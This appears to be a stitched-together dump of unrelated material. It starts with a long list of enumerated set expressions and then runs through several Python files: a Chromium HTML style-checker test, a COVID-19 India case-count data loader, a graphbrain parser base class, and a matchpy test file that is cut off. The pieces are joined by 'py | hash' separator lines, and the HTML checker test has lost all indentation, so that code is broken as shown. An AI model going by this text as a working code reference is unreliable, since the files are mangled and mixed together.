{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), b(6), a(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), b(7), b(6), b(5), a(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), a(6), a(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), a(6), a(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), a(6), a(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), a(6), a(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), a(6), b(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), a(6), b(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), a(6), b(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), a(6), b(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), a(6), b(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), a(6), b(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), b(6), a(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), b(6), a(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), b(6), a(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), b(6), a(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), b(6), a(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), b(6), a(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), b(6), b(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), b(6), b(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), b(6), b(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), a(7), b(6), b(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), a(6), a(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), a(6), a(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), a(6), a(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), a(6), a(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), a(6), a(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), a(6), a(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), a(6), b(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), a(6), b(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), a(6), b(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), a(6), b(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), b(6), a(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), b(6), a(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), b(6), a(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), b(6), a(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), a(8), b(7), b(6), b(5), a(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), a(6), a(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), a(6), a(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), a(6), a(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), a(6), a(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), a(6), a(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), a(6), a(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), a(6), b(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), a(6), b(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), a(6), b(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), a(6), b(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), b(6), a(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), b(6), a(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), b(6), a(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), b(6), a(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), a(7), b(6), b(5), a(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), b(7), a(6), a(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), b(7), a(6), a(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), b(7), a(6), a(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), b(7), a(6), a(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), b(7), a(6), b(5), a(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), b(9), b(8), b(7), b(6), a(5), a(4), a(3), a(2), a(1)}
"""
|
py | 1a37f46ac3449c96f35331649f88d063cc1f7420 | #!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import html_checker
from os import path as os_path
import re
from sys import path as sys_path
import test_util
import unittest
_HERE = os_path.dirname(os_path.abspath(__file__))
sys_path.append(os_path.join(_HERE, '..', '..', '..', 'build'))
import find_depot_tools # pylint: disable=W0611
from testing_support.super_mox import SuperMoxTestBase
class HtmlCheckerTest(SuperMoxTestBase):
def setUp(self):
SuperMoxTestBase.setUp(self)
input_api = self.mox.CreateMockAnything()
input_api.re = re
output_api = self.mox.CreateMockAnything()
self.checker = html_checker.HtmlChecker(input_api, output_api)
def ShouldFailCheck(self, line, checker):
"""Checks that the |checker| flags |line| as a style error."""
error = checker(1, line)
self.assertNotEqual('', error, 'Should be flagged as style error: ' + line)
highlight = test_util.GetHighlight(line, error).strip()
def ShouldPassCheck(self, line, checker):
"""Checks that the |checker| doesn't flag |line| as a style error."""
error = checker(1, line)
self.assertEqual('', error, 'Should not be flagged as style error: ' + line)
def testClassesUseDashFormCheckFails(self):
lines = [
' <a class="Foo-bar" href="classBar"> ',
'<b class="foo-Bar"> ',
'<i class="foo_bar" >',
' <hr class="fooBar"> ',
]
for line in lines:
self.ShouldFailCheck(line, self.checker.ClassesUseDashFormCheck)
def testClassesUseDashFormCheckPasses(self):
lines = [
' class="abc" ',
'class="foo-bar"',
'<div class="foo-bar" id="classBar"',
]
for line in lines:
self.ShouldPassCheck(line, self.checker.ClassesUseDashFormCheck)
def testSingleQuoteCheckFails(self):
lines = [
""" <a href='classBar'> """,
"""<a foo$="bar" href$='classBar'>""",
"""<a foo="bar" less="more" href='classBar' kittens="cats">""",
"""<a cats href='classBar' dogs>""",
"""<a cats\n href='classBat\nclassBaz'\n dogs>""",
]
for line in lines:
self.ShouldFailCheck(line, self.checker.DoNotUseSingleQuotesCheck)
def testSingleQuoteCheckPasses(self):
lines = [
"""<b id="super-valid">SO VALID!</b>""",
"""<a text$="i ain't got invalid quotes">i don't</a>""",
"""<span>[[i18n('blah')]]</span> """,
"""<a cats href="classBar" dogs>""",
"""<a cats\n href="classBar"\n dogs>""",
]
for line in lines:
self.ShouldPassCheck(line, self.checker.DoNotUseSingleQuotesCheck)
def testDoNotCloseSingleTagsCheckFails(self):
lines = [
"<input/>",
' <input id="a" /> ',
"<div/>",
"<br/>",
"<br />",
]
for line in lines:
self.ShouldFailCheck(line, self.checker.DoNotCloseSingleTagsCheck)
def testDoNotCloseSingleTagsCheckPasses(self):
lines = [
"<input>",
"<link>",
"<div></div>",
'<input text="/">',
]
for line in lines:
self.ShouldPassCheck(line, self.checker.DoNotCloseSingleTagsCheck)
def testDoNotUseBrElementCheckFails(self):
lines = [
" <br>",
"<br > ",
"<br\>",
'<br name="a">',
]
for line in lines:
self.ShouldFailCheck(
line, self.checker.DoNotUseBrElementCheck)
def testDoNotUseBrElementCheckPasses(self):
lines = [
"br",
"br>",
"give me a break"
]
for line in lines:
self.ShouldPassCheck(
line, self.checker.DoNotUseBrElementCheck)
def testDoNotUseInputTypeButtonCheckFails(self):
lines = [
'<input type="button">',
' <input id="a" type="button" >',
'<input type="button" id="a"> ',
]
for line in lines:
self.ShouldFailCheck(line, self.checker.DoNotUseInputTypeButtonCheck)
def testDoNotUseInputTypeButtonCheckPasses(self):
lines = [
"<input>",
'<input type="text">',
'<input type="result">',
'<input type="submit">',
"<button>",
'<button type="button">',
'<button type="reset">',
'<button type="submit">',
]
for line in lines:
self.ShouldPassCheck(line, self.checker.DoNotUseInputTypeButtonCheck)
def testI18nContentJavaScriptCaseCheckFails(self):
lines = [
' i18n-content="foo-bar" ',
'i18n-content="foo_bar"',
'i18n-content="FooBar"',
'i18n-content="_foo"',
'i18n-content="foo_"',
'i18n-content="-foo"',
'i18n-content="foo-"',
'i18n-content="Foo"',
]
for line in lines:
self.ShouldFailCheck(line, self.checker.I18nContentJavaScriptCaseCheck)
def testI18nContentJavaScriptCaseCheckPasses(self):
lines = [
' i18n-content="abc" ',
'i18n-content="fooBar"',
'i18n-content="validName" attr="invalidName_"',
'<div i18n-content="exampleTitle"',
]
for line in lines:
self.ShouldPassCheck(line, self.checker.I18nContentJavaScriptCaseCheck)
def testLabelCheckFails(self):
lines = [
' <label for="abc"',
" <label for= ",
" <label\tfor= ",
' <label\n blah="1" blee="3"\n for="goop"',
]
for line in lines:
self.ShouldFailCheck(line, self.checker.LabelCheck)
def testLabelCheckPass(self):
lines = [
' my-for="abc" ',
' myfor="abc" ',
" <for",
' <paper-tooltip for="id-name"',
]
for line in lines:
self.ShouldPassCheck(line, self.checker.LabelCheck)
if __name__ == '__main__':
unittest.main()
|
py | 1a37f4c94fafcde1d52997086287d9a243587766 | import pandas as pd
import datetime
import copy
import requests
from data.dataloader.base import BaseLoader
class Covid19IndiaLoader(BaseLoader):
"""Dataloader that gets casecount data from 'https://api.covid19india.org'
We use the JSON api and not the CSV api
Different API are accessed and then converted into pd.DataFrames
Full list of dataframes are given in the docstrings of pull_dataframes
Args:
BaseLoader (abstract class): Abstract Data Loader Class
"""
def __init__(self):
super().__init__()
def _load_data_json(self):
"""Returns dataframes from data.json
df_tested : dataframe of testing data
df_statewise : dataframe of statewise data (today's snapshot)
df_india_time_series : dataframe of india cases (time series)
Returns:
[pd.DataFrame]: list of dataframes
"""
# Parse data.json file
data = requests.get('https://api.covid19india.org/data.json').json()
# Create dataframe for testing data
df_tested = pd.DataFrame.from_dict(data['tested'])
# Create dataframe for statewise data
df_statewise = pd.DataFrame.from_dict(data['statewise'])
# Create dataframe for time series data
df_india_time_series = pd.DataFrame.from_dict(data['cases_time_series'])
df_india_time_series['date'] = pd.to_datetime([datetime.datetime.strptime(
x.split(' ')[0] + ' ' + x.split(' ')[1][:3] + ' 2020', '%d %b %Y') for x in
df_india_time_series['date']])
return df_tested, df_statewise, df_india_time_series
def _load_state_district_wise_json(self):
"""Loads dataframes from the state_district_wise.json file
df_districtwise : Today's snapshot of district-wise cases
statecode_to_state_dict : Mapping statecode to state name
Returns:
pd.DataFrame, dict: df_districtwise, statecode_to_state_dict
"""
# Load state_district_wise.json file
data = requests.get('https://api.covid19india.org/state_district_wise.json').json()
# Create statecode_to_state_dict
df_statecode = pd.DataFrame.from_dict(data)
df_statecode = df_statecode.drop(['districtData']).T
statecode_to_state_dict = dict(
zip(df_statecode['statecode'], df_statecode.index))
# Create df_districtwise
states = data.keys()
for state in states:
for district, district_dict in data[state]['districtData'].items():
delta_dict = dict([('delta_'+k, v)
for k, v in district_dict['delta'].items()])
data[state]['districtData'][district].update(delta_dict)
del data[state]['districtData'][district]['delta']
columns = ['state', 'district', 'active', 'confirmed', 'deceased',
'recovered', 'migratedother', 'delta_confirmed', 'delta_deceased',
'delta_recovered']
df_districtwise = pd.DataFrame(columns=columns)
for state in states:
df = pd.DataFrame.from_dict(
data[state]['districtData']).T.reset_index()
del df['notes']
df.rename({'index': 'district'}, axis=1, inplace=True)
df['state'] = state
df = df[columns]
df_districtwise = pd.concat([df_districtwise, df], ignore_index=True)
return df_districtwise, statecode_to_state_dict
def _load_raw_data_json(self, NUM_RAW_DFS=30):
"""Loads raw_data from raw_data{i}.json
df_raw : patient level information
Args:
NUM_RAW_DFS (int, optional): Number of raw data json files to consider. Defaults to 30.
"""
# Parse raw_data.json file
raw_data_dataframes = []
for i in range(1, NUM_RAW_DFS+1):
try:
data = requests.get(f'https://api.covid19india.org/raw_data{i}.json').json()
raw_data_dataframes.append(pd.DataFrame.from_dict(data['raw_data']))
except Exception:
break
df_raw = pd.concat(raw_data_dataframes, ignore_index=True)
return df_raw
def _load_districts_daily_json(self):
"""Loads history of cases district wise from districts_daily.json
Returns:
pd.DataFrame: df_districts
"""
data = requests.get('https://api.covid19india.org/districts_daily.json').json()
df_districts = pd.DataFrame(columns=['notes', 'active', 'confirmed', 'deceased',
'recovered', 'date', 'state', 'district'])
for state in data['districtsDaily'].keys():
for dist in data['districtsDaily'][state].keys():
df = pd.DataFrame.from_dict(data['districtsDaily'][state][dist])
df['state'] = state
df['district'] = dist
df_districts = pd.concat([df_districts, df], ignore_index=True)
df_districts = df_districts[['state', 'district', 'date',
'active', 'confirmed', 'deceased', 'recovered', 'notes']]
numeric_cols = ['active', 'confirmed', 'deceased', 'recovered']
df_districts[numeric_cols] = df_districts[numeric_cols].apply(
pd.to_numeric)
return df_districts
def _load_data_all_json_district(self, statecode_to_state_dict):
"""Loads history of cases district wise from data-all.json
Args:
statecode_to_state_dict (dict): dict mapping state code to state name
Returns:
pd.DataFrame: df_districts_all
"""
data = requests.get('https://api.covid19india.org/v4/data-all.json').json()
for date in data.keys():
date_dict = data[date]
# Remove all the states which don't have district data in them
date_dict = {state : state_dict for state, state_dict in date_dict.items() \
if 'districts' in state_dict.keys()}
data[date] = date_dict
# Remove all the dates which have 0 states with district data after pruning
data = {date : date_dict for date, date_dict in data.items() if len(date_dict) > 0}
# Make the districts key data the only data available for the state key
for date in data.keys():
for state in data[date].keys():
# Make the districts key dict the main dict itself for a particular date, state
data[date][state] = data[date][state]['districts']
state_dict = data[date][state]
# Keep only those district dicts for which cumulative data (total key) is available
state_dict = {dist : dist_dict for dist, dist_dict in state_dict.items() \
if 'total' in dist_dict.keys()}
data[date][state] = state_dict
# Make the total key dict the main dict itself for a particular date, state, dist
for district in data[date][state].keys():
data[date][state][district] = data[date][state][district]['total']
                # For a particular date, state, dist, only keep those districts for which confirmed, recovered and deceased are all available
state_dict = {dist: dist_dict for dist, dist_dict in state_dict.items() \
if {'confirmed', 'recovered', 'deceased'} <= dist_dict.keys()}
data[date][state] = state_dict
# Remove all the states for a particular date which don't have district that satisfied above criteria
date_dict = data[date]
date_dict = {state : state_dict for state, state_dict in date_dict.items() if len(state_dict) > 0}
data[date] = date_dict
# Remove all the dates which have 0 states with district data after pruning
data = {date : date_dict for date, date_dict in data.items() if len(date_dict) > 0}
df_districts_all = pd.DataFrame(columns=['date', 'state', 'district', 'confirmed', 'active',
'recovered', 'deceased', 'tested', 'migrated'])
for date in data.keys():
for state in data[date].keys():
df_date_state = pd.DataFrame.from_dict(data[date][state]).T.reset_index()
df_date_state = df_date_state.rename({'index' : 'district'}, axis='columns')
df_date_state['active'] = df_date_state['confirmed'] - \
(df_date_state['recovered'] + df_date_state['deceased'])
df_date_state['state'] = statecode_to_state_dict[state]
df_date_state['date'] = date
df_districts_all = pd.concat([df_districts_all, df_date_state], ignore_index=True, sort=False)
numeric_cols = ['confirmed', 'active', 'recovered', 'deceased', 'tested', 'migrated']
df_districts_all.loc[:, numeric_cols] = df_districts_all.loc[:, numeric_cols].apply(pd.to_numeric)
return df_districts_all
def _load_data_all_json_state(self, statecode_to_state_dict):
"""Loads history of cases state wise from data-all.json
Args:
statecode_to_state_dict (dict): dict mapping state code to state name
Returns:
pd.DataFrame: df_state_all
"""
data = requests.get('https://api.covid19india.org/v4/data-all.json').json()
for date in data.keys():
date_dict = data[date]
# Remove all the states which don't have district data in them
date_dict = {state : state_dict for state, state_dict in date_dict.items() if 'districts' in state_dict.keys()}
data[date] = date_dict
# Remove all the dates which have 0 states with district data after pruning
data = {date : date_dict for date, date_dict in data.items() if len(date_dict) > 0}
# Make the districts key data the only data available for the state key
for date in data.keys():
for state in data[date].keys():
# Make the districts key dict the main dict itself for a particular date, state
data[date][state] = data[date][state]['total']
date_dict = {state: state_dict for state, state_dict in data[date].items() \
if {'confirmed', 'recovered', 'deceased'} <= state_dict.keys()}
data[date] = date_dict
# Remove all the dates which have 0 states with district data after pruning
data = {date: date_dict for date, date_dict in data.items() if len(date_dict) > 0}
df_states_all = pd.DataFrame(columns=['date', 'state', 'confirmed', 'active', 'recovered', 'deceased', 'tested', 'migrated'])
for date in data.keys():
df_date = pd.DataFrame.from_dict(data[date]).T.reset_index()
df_date = df_date.rename({'index': 'state'}, axis='columns')
df_date['active'] = df_date['confirmed'] - (df_date['recovered'] + df_date['deceased'])
df_date['state'] = pd.Series([statecode_to_state_dict[state_code] for state_code in df_date['state']])
df_date['date'] = date
df_states_all = pd.concat([df_states_all, df_date], ignore_index=True)
numeric_cols = ['confirmed', 'active', 'recovered', 'deceased', 'tested', 'migrated']
df_states_all.loc[:, numeric_cols] = df_states_all.loc[:, numeric_cols].apply(pd.to_numeric)
return df_states_all
def _load_districts_csv(self):
df = pd.read_csv('https://api.covid19india.org/csv/latest/districts.csv')
df.columns = [x.lower() for x in df.columns]
df['active'] = df['confirmed'] - (df['recovered'] + df['deceased'])
numeric_cols = ['confirmed', 'active',
'recovered', 'deceased', 'tested', 'other']
df.loc[:, numeric_cols] = df.loc[:, numeric_cols].apply(pd.to_numeric)
df = df.fillna(0)
df['date'] = pd.to_datetime(df['date'], format="%Y-%m-%d")
return df
def pull_dataframes(self, load_raw_data=False, load_districts_daily=False, **kwargs):
"""
This function parses multiple JSONs from covid19india.org
It then converts the data into pandas dataframes
It returns the following dataframes as a dict :
- df_tested : Time series of people tested in India
- df_statewise : Today's snapshot of cases in India, statewise
- df_india_time_series : Time series of cases in India (nationwide)
- df_districtwise : Today's snapshot of cases in India, districtwise
- df_raw_data : Patient level information of cases
- df_districts_daily : History of cases district wise obtained from districts_daily.json
- df_districts_all : History of cases district wise obtained from data_all.json
- df_states_all : History of cases state wise obtained from data_all.json
"""
# List of dataframes to return
dataframes = {}
df_tested, df_statewise, df_india_time_series = self._load_data_json()
dataframes['df_tested'] = df_tested
dataframes['df_statewise'] = df_statewise
dataframes['df_india_time_series'] = df_india_time_series
df_districtwise, statecode_to_state_dict = self._load_state_district_wise_json()
dataframes['df_districtwise'] = df_districtwise
if load_raw_data:
df_raw = self._load_raw_data_json()
dataframes['df_raw_data'] = df_raw
if load_districts_daily:
df_districts = self._load_districts_daily_json()
dataframes['df_districts_daily'] = df_districts
df_districts_all = self._load_data_all_json_district(statecode_to_state_dict)
dataframes['df_districts_all'] = df_districts_all
df_states_all = self._load_data_all_json_state(statecode_to_state_dict)
dataframes['df_states_all'] = df_states_all
df_districts = self._load_districts_csv()
dataframes['df_districts'] = df_districts
return dataframes
def pull_dataframes_cached(self, reload_data=False, label=None, **kwargs):
return super().pull_dataframes_cached(reload_data=reload_data, label=label, **kwargs)
def get_data(self, state='Maharashtra', district='Mumbai', use_dataframe='data_all',
reload_data=False, **kwargs):
"""Main function serving as handshake between data and fitting modules
Args:
state (str, optional): State to fit on. Defaults to 'Maharashtra'.
district (str, optional): District to fit on. If given, get_data_district is called.
Else, get_data_state is called. Defaults to 'Mumbai'.
use_dataframe (str, optional): Which dataframe to use for districts.
Can be data_all/districts_daily. Defaults to 'data_all'.
reload_data (bool, optional): arg for pull_dataframes_cached. If true, data is
pulled afresh, rather than using the cache. Defaults to False.
Returns:
dict { str : pd.DataFrame } : Processed dataframe
"""
        if district is not None:
return {"data_frame": self.get_data_district(state, district, use_dataframe,
reload_data, **kwargs)}
else:
return {"data_frame": self.get_data_state(state, reload_data, **kwargs)}
def get_data_state(self, state='Delhi', reload_data=False, **kwargs):
"""Helper function for get_data. Returns state data
Args:
state (str, optional): State to fit on. Defaults to 'Delhi'.
reload_data (bool, optional): arg for pull_dataframes_cached. If true, data is
pulled afresh, rather than using the cache. Defaults to False.
Returns:
dict { str : pd.DataFrame } : Processed dataframe
"""
dataframes = self.pull_dataframes_cached(reload_data=reload_data, **kwargs)
df_states = copy.copy(dataframes['df_states_all'])
df_state = df_states[df_states['state'] == state]
df_state['date'] = pd.to_datetime(df_state['date'])
df_state = df_state.rename({'confirmed': 'total'}, axis='columns')
df_state.reset_index(inplace=True, drop=True)
return df_state
def get_data_district(self, state='Karnataka', district='Bengaluru',
use_dataframe='data_all', reload_data=False, **kwargs):
"""Helper function for get_data. Returns district data
Args:
state (str, optional): State to fit on. Defaults to 'Karnataka'.
district (str, optional): District to fit on. Defaults to 'Bengaluru'.
use_dataframe (str, optional) : Which dataframe to use. Can be `data_all`/`districts_daily`.
reload_data (bool, optional): arg for pull_dataframes_cached. If true, data is
pulled afresh, rather than using the cache. Defaults to False.
Returns:
dict { str : pd.DataFrame } : Processed dataframe
"""
dataframes = self.pull_dataframes_cached(reload_data=reload_data, **kwargs)
if use_dataframe == 'data_all':
df_districts = copy.copy(dataframes['df_districts_all'])
df_district = df_districts.loc[(df_districts['state'] == state) & (
df_districts['district'] == district)]
df_district.loc[:, 'date'] = pd.to_datetime(df_district.loc[:, 'date'])
df_district = df_district.rename({'confirmed': 'total'}, axis='columns')
del df_district['migrated']
df_district.reset_index(inplace=True, drop=True)
return df_district
if use_dataframe == 'districts_daily':
df_districts = copy.copy(dataframes['df_districts_daily'])
df_district = df_districts.loc[(df_districts['state'] == state) & (
df_districts['district'] == district)]
del df_district['notes']
df_district.loc[:, 'date'] = pd.to_datetime(df_district.loc[:, 'date'])
df_district = df_district.loc[df_district['date'] >= '2020-04-24', :]
df_district = df_district.rename({'confirmed': 'total'}, axis='columns')
df_district.reset_index(inplace=True, drop=True)
return df_district
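# Hedged usage sketch (not part of the loader): one way to drive the API
# above; everything beyond the documented get_data signature is illustrative.
if __name__ == '__main__':
    loader = Covid19IndiaLoader()
    out = loader.get_data(state='Maharashtra', district='Mumbai', use_dataframe='data_all')
    df = out['data_frame']
    # expect columns like date, state, district, total, active, recovered, deceased
    print(df.tail())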
|
py | 1a37f547ae843d38b3dd3d6f5aa0d2d040a4c785 | import sys
import logging
from collections import namedtuple
logging.basicConfig(stream=sys.stderr, level=logging.WARNING)
class Parser(object):
"""Defines the common interface for parser objects.
    Parsers transform natural text into graphbrain hyperedges.
"""
def __init__(self, lemmas=False):
self.lemmas = lemmas
self.atom2token = {}
self.cur_text = None
# to be created by derived classes
self.lang = None
self.nlp = None
# named tuple used to pass parser state internally
self._ParseState = namedtuple('_ParseState',
['extra_edges', 'tokens', 'child_tokens',
'positions', 'children', 'entities'])
    def _post_process(self, edge):
        raise NotImplementedError()
    def _parse_token(self, token):
        raise NotImplementedError()
def _parse_sentence(self, sent):
self.atom2token = {}
main_edge, extra_edges = self._parse_token(sent.root)
main_edge, _ = self._post_process(main_edge)
return {'main_edge': main_edge,
'extra_edges': extra_edges,
'text': str(sent).strip(),
'spacy_sentence': sent}
def parse(self, text):
"""Transforms the given text into hyperedges + aditional information.
Returns a sequence of dictionaries, with one dictionary for each
sentence found in the text.
Each dictionary contains the following fields:
-> main_edge: the hyperedge corresponding to the sentence.
        -> extra_edges: additional edges, e.g. connecting atoms that appear
in the main_edge to their lemmas.
-> text: the string of natural language text corresponding to the
main_edge, i.e.: the sentence itself.
-> spacy_sentence: the spaCy structure representing the sentence
enriched with NLP annotations.
"""
self.cur_text = text
doc = self.nlp(text.strip())
return tuple(self._parse_sentence(sent) for sent in doc.sents)
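# Hedged sketch of a minimal concrete subclass; the spaCy model name and the
# trivial token handling are illustrative assumptions, not the real parsers.
class EchoParser(Parser):
    def __init__(self, lemmas=False):
        import spacy
        super().__init__(lemmas=lemmas)
        self.lang = 'en'
        self.nlp = spacy.load('en_core_web_sm')  # assumes this model is installed
    def _post_process(self, edge):
        return edge, None
    def _parse_token(self, token):
        return token.text, []
# EchoParser().parse('The sky is blue.') yields one dict per sentence with the
# keys documented in Parser.parse above.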
|
py | 1a37f5de7e35dec35354fa7cf6eabc2c6e87afed | # -*- coding: utf-8 -*-
from hypothesis import assume, given
import hypothesis.strategies as st
import pytest
from matchpy.expressions.expressions import Arity, Operation, Symbol, Wildcard, Pattern
from matchpy.functions import ReplacementRule, replace, replace_all, substitute, replace_many, is_match
from matchpy.matching.one_to_one import match_anywhere
from matchpy.matching.one_to_one import match as match_one_to_one
from matchpy.matching.many_to_one import ManyToOneReplacer
from .common import *
@pytest.mark.parametrize(
' expr, pattern, do_match',
[
(a, a, True),
(a, b, False),
(f(a), f(x_), True),
]
) # yapf: disable
def test_is_match(expr, pattern, do_match):
assert is_match(expr, Pattern(pattern)) == do_match
class TestSubstitute:
@pytest.mark.parametrize(
' expression, substitution, expected_result, replaced',
[
(a, {}, a, False),
(a, {'x': b}, a, False),
(x_, {'x': b}, b, True),
(x_, {'x': [a, b]}, [a, b], True),
